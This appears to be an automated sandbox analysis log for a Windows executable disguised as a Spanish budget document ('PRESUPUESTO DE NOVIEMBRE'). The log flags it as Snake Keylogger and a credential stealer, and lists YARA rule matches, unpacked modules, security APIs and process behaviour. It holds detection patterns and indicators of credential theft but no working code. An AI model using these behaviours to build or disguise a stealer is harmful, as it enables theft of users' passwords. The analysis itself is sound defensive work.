Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_01504204		2_2_01504204
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0150E134		2_2_0150E134
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_01507018		2_2_01507018
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07810E28		2_2_07810E28
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07817AF1		2_2_07817AF1
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781A713		2_2_0781A713
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781A758		2_2_0781A758
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781C660		2_2_0781C660
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781C670		2_2_0781C670
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781C238		2_2_0781C238
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_078130D0		2_2_078130D0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07813F88		2_2_07813F88
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781CF48		2_2_0781CF48
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07813F77		2_2_07813F77
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07810E21		2_2_07810E21
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07813CEB		2_2_07813CEB
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07813CF0		2_2_07813CF0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781AB90		2_2_0781AB90
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03005380		5_2_03005380
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300D288		5_2_0300D288
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03007118		5_2_03007118
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300C148		5_2_0300C148
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300C748		5_2_0300C748
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300C478		5_2_0300C478
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CA18		5_2_0300CA18
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300E988		5_2_0300E988
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_030069B0		5_2_030069B0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CFB8		5_2_0300CFB8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03009DE0		5_2_03009DE0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CCE8		5_2_0300CCE8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03005362		5_2_03005362
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300D278		5_2_0300D278
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300C738		5_2_0300C738
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300C468		5_2_0300C468
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CA08		5_2_0300CA08
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03003AA1		5_2_03003AA1
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300F961		5_2_0300F961
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300F970		5_2_0300F970
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300E97B		5_2_0300E97B
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_030029EC		5_2_030029EC
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_030039EF		5_2_030039EF
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CFA9		5_2_0300CFA9
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03003E18		5_2_03003E18
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CCD8		5_2_0300CCD8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C19548		5_2_05C19548
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1FC68		5_2_05C1FC68
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C19C18		5_2_05C19C18
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C15028		5_2_05C15028
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1DDFF		5_2_05C1DDFF
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1D545		5_2_05C1D545
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1D550		5_2_05C1D550
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1CC8F		5_2_05C1CC8F
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1CCA0		5_2_05C1CCA0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1178F		5_2_05C1178F
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C117A0		5_2_05C117A0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C14FA3		5_2_05C14FA3
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1EF51		5_2_05C1EF51
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1EF60		5_2_05C1EF60
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C11E80		5_2_05C11E80
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1E6A0		5_2_05C1E6A0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1E6B0		5_2_05C1E6B0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C11E70		5_2_05C11E70
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1DE00		5_2_05C1DE00
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1D999		5_2_05C1D999
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1D9A8		5_2_05C1D9A8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1295A		5_2_05C1295A
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C12968		5_2_05C12968
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1D0F8		5_2_05C1D0F8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C10040		5_2_05C10040
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1F801		5_2_05C1F801
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C10007		5_2_05C10007
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1F810		5_2_05C1F810
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C15018		5_2_05C15018
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C18B91		5_2_05C18B91
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C18BA0		5_2_05C18BA0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1F3A8		5_2_05C1F3A8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1F3B8		5_2_05C1F3B8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1EB08		5_2_05C1EB08
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C10B20		5_2_05C10B20
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C10B30		5_2_05C10B30
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1E249		5_2_05C1E249
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1E258		5_2_05C1E258

Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000000.1290231489.0000000000C6A000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameagpG.exe: vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1313850390.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1312841202.000000000125E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1318757187.000000000BA20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3748024506.00000000012F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe	Binary or memory string: OriginalFilenameagpG.exe: vs PRESUPUESTO DE NOVIEMBRE...exe

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, -.cs

Base64 encoded string: 'Xz5uie5TI+VAXJi5s+jK5JOMMKuvu0k+fP51uwEy6JFuAQXVFI2evOQ79rnb+BR6'

Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.SetAccessControl
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.AddAccessRule
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.SetAccessControl
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.AddAccessRule
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.SetAccessControl
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/3

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PRESUPUESTO DE NOVIEMBRE...exe.log

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Mutant created: NULL

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.000000000339E000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.000000000338E000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000033DD000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PRESUPUESTO DE NOVIEMBRE...exe

ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"			Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: dwrite.dll			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Section loaded: textshaping.dll			Jump to behavior
